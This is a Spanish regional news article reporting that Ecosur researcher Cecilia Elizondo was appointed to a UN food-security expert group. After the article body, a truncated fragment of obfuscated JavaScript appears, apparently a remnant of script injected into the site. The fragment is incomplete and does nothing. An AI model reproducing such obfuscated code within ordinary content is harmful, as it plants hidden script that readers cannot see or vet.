Al Comité de Seguridad Alimentaria Mundial de la ONU investigadora de Ecosur

Óscar Gómez/ Corresponsal
02 de Diciembre del 2023. San Cristóbal de Las Casas.- El Colegio de la Frontera Sur (Ecosur) dio a conocer que la investigadora y académica, Cecilia Elizondo fue designada como integrante del Comité de Seguridad Alimentaria Mundial (CSA) de la ONU.

La investigadora mexicana es una de las 15 personas expertas que conforman el grupo directivo del Ganesan, que es el órgano de asesoramiento científico de las Naciones Unidas para temas relacionados con la alimentación.

En un comunicado, informaron que este grupo se hará cargo de evaluar y analizar el estado actual de la seguridad alimentaria y sus causas subyacentes. La investigadora de Ecosur cuenta con más de 30 años de experiencia en la gestión ambiental, lo que lo llevó a ocupar este importante cargo.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Operativos conjuntos refuerzan control en bares y centros nocturnos de San Cristóbal

Yolanda Rodríguez/ corresponsal 4 de enero del 2025. San Cristóbal de Las Casas.– Autoridades municipales …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *